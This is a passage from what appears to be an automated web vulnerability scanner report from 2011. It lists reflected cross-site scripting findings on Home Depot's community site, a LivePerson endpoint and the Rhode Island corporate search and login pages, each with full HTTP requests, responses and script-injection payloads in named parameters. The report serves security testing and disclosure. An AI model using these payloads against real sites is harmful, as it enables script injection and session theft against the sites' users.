GET /restapi/vc/boards/id/replace?xslt=json.xsl&callback=jsonp1310488529617f5c71<img%20src%3da%20onerror%3dalert(1)>070705f0df3 HTTP/1.1
Host: community.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=JOV9mEDH97qHDqOENJ2a%2foByFXM%3d%0a%3b2011%2d06%2d16+08%3a16%3a48%2e923%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita7t%2fWC%5fTHD2%5fccaita7t%2f1310488436587%3a%3bC25%5fEXP%3d1362328436%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; THD_CACHE_NAV_SESSION=C20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e; THD_SESSION=C6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1%3A%3BC34%3D1.0-2.1-3.0-4.0-5.0%3A%3BC34_EXP%3D-1; s_pers=%20s_campaign%3Dno%2520value%7C1310490339841%3B%20s_prevPage%3Dhomepage%7C1310490339843%3B%20p_30%3DHome%2520Page%7C1310490339844%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B; RES_SESSIONID=877035136567428; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=1; VISITORID=910187893

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:34:34 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Content-Length: 608
Connection: close
Content-Type: application/json;charset=UTF-8

jsonp1310488529617f5c71<img src=a onerror=alert(1)>070705f0df3({"response":{"status":"success","board":{"type":"board","href":"\/boards\/id\/replace","id":{"type":"string","$":"replace"},"owner":{"type":"user","null":"true"},"interaction_style":{"type":"string","
...[SNIP]...

3.8. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload ad89c%0aa7074f0f5d5 was submitted in the site parameter. This input was echoed as ad89c
a7074f0f5d5
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visitor/addons/deploy.asp?site=57386690ad89c%0aa7074f0f5d5&d_id=THD HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:36:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Length: 2141
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDQSATCQQT=POMBMBKDCKNCLFAFAHDBCMPC; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 57386690ad89c
a7074f0f5d5

lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maem
...[SNIP]...

3.9. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [ActiveFlagCrit parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ucc.state.ri.us
Path:   /CorpSearch/CorpSearchEntityList.asp

Issue detail

The value of the ActiveFlagCrit request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4392f"><script>alert(1)</script>558a4aa6fa8 was submitted in the ActiveFlagCrit parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /CorpSearch/CorpSearchEntityList.asp?ReadFromDB=True&UpdateAllowed= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
Content-Length: 448
Cache-Control: max-age=0
Origin: http://ucc.state.ri.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

ActiveFlagCrit=Y4392f"><script>alert(1)</script>558a4aa6fa8&SearchType=E&EntityName=xss&EntitySearchMethod=B&FEIN=&FilingNumber=&IndividualSearchMethod=B&FirstName=&MiddleName=&LastName=&AgentSearchMethod=B&AgentName=&Address=&Purpose=&lstDisplay=25&DetailId=
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:48:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8555
Content-Type: text/html
Cache-control: private


<HTML>

<HEAD>
<Title>State of Rhode Island and Providence Plantations -&nbsp;Public Browse and Search</title>

<style type="text/css">
.label {
   font-family: "Courier New", Courier, monospac
...[SNIP]...
<input type=hidden name=ActiveFlagCrit value="Y4392f"><script>alert(1)</script>558a4aa6fa8">
...[SNIP]...

3.10. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [Address parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ucc.state.ri.us
Path:   /CorpSearch/CorpSearchEntityList.asp

Issue detail

The value of the Address request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 843a1"><script>alert(1)</script>d889694b614 was submitted in the Address parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /CorpSearch/CorpSearchEntityList.asp?ReadFromDB=True&UpdateAllowed= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
Content-Length: 448
Cache-Control: max-age=0
Origin: http://ucc.state.ri.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

ActiveFlagCrit=Y&SearchType=E&EntityName=xss&EntitySearchMethod=B&FEIN=&FilingNumber=&IndividualSearchMethod=B&FirstName=&MiddleName=&LastName=&AgentSearchMethod=B&AgentName=&Address=843a1"><script>alert(1)</script>d889694b614&Purpose=&lstDisplay=25&DetailId=&Refile=&FormCode=0000160&FilingMethod=I&FilingFee=&ReadFromDB=False&Refreshed=True&OldFEIN=&OldEntityName=&OldFiscalMonth=&OldFiscalDay=&NewFormation=&FilingNum=&Batc
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:49:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8555
Content-Type: text/html
Cache-control: private


<HTML>

<HEAD>
<Title>State of Rhode Island and Providence Plantations -&nbsp;Public Browse and Search</title>

<style type="text/css">
.label {
   font-family: "Courier New", Courier, monospac
...[SNIP]...
<input type=hidden name=Address value="843a1"><script>alert(1)</script>d889694b614">
...[SNIP]...

3.11. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [AgentName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ucc.state.ri.us
Path:   /CorpSearch/CorpSearchEntityList.asp

Issue detail

The value of the AgentName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e6fa"><script>alert(1)</script>08ee8de438 was submitted in the AgentName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /CorpSearch/CorpSearchEntityList.asp?ReadFromDB=True&UpdateAllowed= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
Content-Length: 448
Cache-Control: max-age=0
Origin: http://ucc.state.ri.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

ActiveFlagCrit=Y&SearchType=E&EntityName=xss&EntitySearchMethod=B&FEIN=&FilingNumber=&IndividualSearchMethod=B&FirstName=&MiddleName=&LastName=&AgentSearchMethod=B&AgentName=7e6fa"><script>alert(1)</script>08ee8de438&Address=&Purpose=&lstDisplay=25&DetailId=&Refile=&FormCode=0000160&FilingMethod=I&FilingFee=&ReadFromDB=False&Refreshed=True&OldFEIN=&OldEntityName=&OldFiscalMonth=&OldFiscalDay=&NewFormation=&Filing
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:49:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8554
Content-Type: text/html
Cache-control: private


<HTML>

<HEAD>
<Title>State of Rhode Island and Providence Plantations -&nbsp;Public Browse and Search</title>

<style type="text/css">
.label {
   font-family: "Courier New", Courier, monospac
...[SNIP]...
<input type=hidden name=AgentName value="7e6fa"><script>alert(1)</script>08ee8de438">
...[SNIP]...

3.12. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [EntityName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ucc.state.ri.us
Path:   /CorpSearch/CorpSearchEntityList.asp

Issue detail

The value of the EntityName request parameter is copied into the HTML document as plain text between tags. The payload dbe0c<script>alert(1)</script>9f9c99aea8 was submitted in the EntityName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /CorpSearch/CorpSearchEntityList.asp?ReadFromDB=True&UpdateAllowed= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
Content-Length: 448
Cache-Control: max-age=0
Origin: http://ucc.state.ri.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

ActiveFlagCrit=Y&SearchType=E&EntityName=xssdbe0c<script>alert(1)</script>9f9c99aea8&EntitySearchMethod=B&FEIN=&FilingNumber=&IndividualSearchMethod=B&FirstName=&MiddleName=&LastName=&AgentSearchMethod=B&AgentName=&Address=&Purpose=&lstDisplay=25&DetailId=&Refile=&FormCode=0000160&Fi
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:49:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8592
Content-Type: text/html
Cache-control: private


<HTML>

<HEAD>
<Title>State of Rhode Island and Providence Plantations -&nbsp;Public Browse and Search</title>

<style type="text/css">
.label {
   font-family: "Courier New", Courier, monospac
...[SNIP]...
<u>xssdbe0c<script>alert(1)</script>9f9c99aea8</u>
...[SNIP]...

3.13. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [EntitySearchMethod parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ucc.state.ri.us
Path:   /CorpSearch/CorpSearchEntityList.asp

Issue detail

The value of the EntitySearchMethod request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6e30"><script>alert(1)</script>4cfbec7b07a was submitted in the EntitySearchMethod parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /CorpSearch/CorpSearchEntityList.asp?ReadFromDB=True&UpdateAllowed= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
Content-Length: 448
Cache-Control: max-age=0
Origin: http://ucc.state.ri.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

ActiveFlagCrit=Y&SearchType=E&EntityName=xss&EntitySearchMethod=Be6e30"><script>alert(1)</script>4cfbec7b07a&FEIN=&FilingNumber=&IndividualSearchMethod=B&FirstName=&MiddleName=&LastName=&AgentSearchMethod=B&AgentName=&Address=&Purpose=&lstDisplay=25&DetailId=&Refile=&FormCode=0000160&FilingMethod=I&FilingFe
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:49:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8543
Content-Type: text/html
Cache-control: private


<HTML>

<HEAD>
<Title>State of Rhode Island and Providence Plantations -&nbsp;Public Browse and Search</title>

<style type="text/css">
.label {
   font-family: "Courier New", Courier, monospac
...[SNIP]...
<input type=hidden name=SearchMethod value="Be6e30"><script>alert(1)</script>4cfbec7b07a">
...[SNIP]...

3.14. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [FirstName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ucc.state.ri.us
Path:   /CorpSearch/CorpSearchEntityList.asp

Issue detail

The value of the FirstName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7350f"><script>alert(1)</script>44583332d2b was submitted in the FirstName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /CorpSearch/CorpSearchEntityList.asp?ReadFromDB=True&UpdateAllowed= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
Content-Length: 448
Cache-Control: max-age=0
Origin: http://ucc.state.ri.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

ActiveFlagCrit=Y&SearchType=E&EntityName=xss&EntitySearchMethod=B&FEIN=&FilingNumber=&IndividualSearchMethod=B&FirstName=7350f"><script>alert(1)</script>44583332d2b&MiddleName=&LastName=&AgentSearchMethod=B&AgentName=&Address=&Purpose=&lstDisplay=25&DetailId=&Refile=&FormCode=0000160&FilingMethod=I&FilingFee=&ReadFromDB=False&Refreshed=True&OldFEIN=&OldEntityNam
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:49:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8555
Content-Type: text/html
Cache-control: private


<HTML>

<HEAD>
<Title>State of Rhode Island and Providence Plantations -&nbsp;Public Browse and Search</title>

<style type="text/css">
.label {
   font-family: "Courier New", Courier, monospac
...[SNIP]...
<input type=hidden name=FirstName value="7350f"><script>alert(1)</script>44583332d2b">
...[SNIP]...

3.15. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [LastName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ucc.state.ri.us
Path:   /CorpSearch/CorpSearchEntityList.asp

Issue detail

The value of the LastName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e9bf"><script>alert(1)</script>9f858503452 was submitted in the LastName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /CorpSearch/CorpSearchEntityList.asp?ReadFromDB=True&UpdateAllowed= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
Content-Length: 448
Cache-Control: max-age=0
Origin: http://ucc.state.ri.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

ActiveFlagCrit=Y&SearchType=E&EntityName=xss&EntitySearchMethod=B&FEIN=&FilingNumber=&IndividualSearchMethod=B&FirstName=&MiddleName=&LastName=9e9bf"><script>alert(1)</script>9f858503452&AgentSearchMethod=B&AgentName=&Address=&Purpose=&lstDisplay=25&DetailId=&Refile=&FormCode=0000160&FilingMethod=I&FilingFee=&ReadFromDB=False&Refreshed=True&OldFEIN=&OldEntityName=&OldFiscalMonth=&Old
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:49:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8555
Content-Type: text/html
Cache-control: private


<HTML>

<HEAD>
<Title>State of Rhode Island and Providence Plantations -&nbsp;Public Browse and Search</title>

<style type="text/css">
.label {
   font-family: "Courier New", Courier, monospac
...[SNIP]...
<input type=hidden name=LastName value="9e9bf"><script>alert(1)</script>9f858503452">
...[SNIP]...

3.16. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [MiddleName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ucc.state.ri.us
Path:   /CorpSearch/CorpSearchEntityList.asp

Issue detail

The value of the MiddleName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8668e"><script>alert(1)</script>3a488b53b99 was submitted in the MiddleName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /CorpSearch/CorpSearchEntityList.asp?ReadFromDB=True&UpdateAllowed= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
Content-Length: 448
Cache-Control: max-age=0
Origin: http://ucc.state.ri.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

ActiveFlagCrit=Y&SearchType=E&EntityName=xss&EntitySearchMethod=B&FEIN=&FilingNumber=&IndividualSearchMethod=B&FirstName=&MiddleName=8668e"><script>alert(1)</script>3a488b53b99&LastName=&AgentSearchMethod=B&AgentName=&Address=&Purpose=&lstDisplay=25&DetailId=&Refile=&FormCode=0000160&FilingMethod=I&FilingFee=&ReadFromDB=False&Refreshed=True&OldFEIN=&OldEntityName=&OldFiscal
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:49:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8555
Content-Type: text/html
Cache-control: private


<HTML>

<HEAD>
<Title>State of Rhode Island and Providence Plantations -&nbsp;Public Browse and Search</title>

<style type="text/css">
.label {
   font-family: "Courier New", Courier, monospac
...[SNIP]...
<input type=hidden name=MiddleName value="8668e"><script>alert(1)</script>3a488b53b99">
...[SNIP]...

3.17. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [Purpose parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ucc.state.ri.us
Path:   /CorpSearch/CorpSearchEntityList.asp

Issue detail

The value of the Purpose request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d359"><script>alert(1)</script>3a9aab12ca4 was submitted in the Purpose parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /CorpSearch/CorpSearchEntityList.asp?ReadFromDB=True&UpdateAllowed= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
Content-Length: 448
Cache-Control: max-age=0
Origin: http://ucc.state.ri.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

ActiveFlagCrit=Y&SearchType=E&EntityName=xss&EntitySearchMethod=B&FEIN=&FilingNumber=&IndividualSearchMethod=B&FirstName=&MiddleName=&LastName=&AgentSearchMethod=B&AgentName=&Address=&Purpose=3d359"><script>alert(1)</script>3a9aab12ca4&lstDisplay=25&DetailId=&Refile=&FormCode=0000160&FilingMethod=I&FilingFee=&ReadFromDB=False&Refreshed=True&OldFEIN=&OldEntityName=&OldFiscalMonth=&OldFiscalDay=&NewFormation=&FilingNum=&BatchNum=&Doc
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:49:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8555
Content-Type: text/html
Cache-control: private


<HTML>

<HEAD>
<Title>State of Rhode Island and Providence Plantations -&nbsp;Public Browse and Search</title>

<style type="text/css">
.label {
   font-family: "Courier New", Courier, monospac
...[SNIP]...
<input type=hidden name=Purpose value="3d359"><script>alert(1)</script>3a9aab12ca4">
...[SNIP]...

3.18. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [SearchType parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ucc.state.ri.us
Path:   /CorpSearch/CorpSearchEntityList.asp

Issue detail

The value of the SearchType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a8de"><script>alert(1)</script>fed265178c7 was submitted in the SearchType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /CorpSearch/CorpSearchEntityList.asp?ReadFromDB=True&UpdateAllowed= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
Content-Length: 448
Cache-Control: max-age=0
Origin: http://ucc.state.ri.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

ActiveFlagCrit=Y&SearchType=E2a8de"><script>alert(1)</script>fed265178c7&EntityName=xss&EntitySearchMethod=B&FEIN=&FilingNumber=&IndividualSearchMethod=B&FirstName=&MiddleName=&LastName=&AgentSearchMethod=B&AgentName=&Address=&Purpose=&lstDisplay=25&DetailId=&Refile=&Form
...[SNIP]...

Response

HTTP/1.1 500 Internal Server Error
Date: Wed, 13 Jul 2011 00:49:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 4846
Content-Type: text/html
Cache-control: private

<Script Language=JavaScript>
alert('System Error: 900105\n\nOur system appears to be experiencing some difficulty at the moment.\n\nPlease try again later or contact technical support for more inform
...[SNIP]...
<input type=hidden name=SearchType value="E2a8de"><script>alert(1)</script>fed265178c7">
...[SNIP]...

3.19. http://ucc.state.ri.us/loginsystem/login.asp [FilingMethod parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ucc.state.ri.us
Path:   /loginsystem/login.asp

Issue detail

The value of the FilingMethod request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d411"%3balert(1)//2d4c3ef54be was submitted in the FilingMethod parameter. This input was echoed as 6d411";alert(1)//2d4c3ef54be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /loginsystem/login.asp?FilingMethod=6d411"%3balert(1)//2d4c3ef54be HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
